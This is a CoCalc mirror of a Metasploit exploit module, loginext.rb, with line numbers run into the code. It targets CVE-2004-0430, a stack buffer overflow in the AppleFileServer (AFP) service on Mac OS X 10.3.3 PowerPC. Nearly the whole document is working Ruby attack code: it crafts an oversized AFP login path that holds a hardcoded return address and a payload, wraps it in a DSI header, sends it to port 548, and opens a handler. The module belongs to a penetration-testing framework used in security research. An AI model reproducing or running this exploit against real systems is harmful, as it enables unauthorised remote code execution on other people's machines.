CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/osx/afp/loginext.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'AppleFileServer LoginExt PathName Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in the AppleFileServer service15on MacOS X. This vulnerability was originally reported by Atstake and16was actually one of the few useful advisories ever published by that17company. You only have one chance to exploit this bug.18This particular exploit uses a stack-based return address that will19only work under optimal conditions.20},21'Author' => 'hdm',22'License' => MSF_LICENSE,23'References' =>24[25[ 'CVE', '2004-0430'],26[ 'OSVDB', '5762'],27[ 'BID', '10271'],28],29'Payload' =>30{31'Space' => 512,32'BadChars' => "\x00\x20",33'MinNops' => 128,34'Compat' =>35{36'ConnectionType' => "+find"37}38},39'Platform' => %w{ osx },40'Targets' =>41[42# Target 043[44'Mac OS X 10.3.3',45{46'Platform' => 'osx',47'Arch' => ARCH_PPC,48'Ret' => 0xf0101c0c # stack address :<49},50],51],52'DisclosureDate' => '2004-05-03'))5354# Configure the default port to be AFP55register_options(56[57Opt::RPORT(548),58])59end6061def exploit62connect6364print_status("Trying target #{target.name}...")6566path = "\xff" * 102467path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)68path[172, payload.encoded.length] = payload.encoded6970# The AFP header71afp = "\x3f\x00\x00\x00"7273# Add the authentication methods74["AFP3.1", "Cleartxt Passwrd"].each { |m|75afp << [m.length].pack('C') + m76}7778# Add the user type and afp path79afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)80afp << "\x03" + [path.length].pack('n') + path8182# Add the data stream interface header83dsi =84[850, # Flags862, # Command87rand(65536), # XID880, # Data Offset89afp.length, # Data Length900 # Reserved91].pack("CCnNNN") + afp9293sock.put(dsi)9495handler9697disconnect98end99end100101102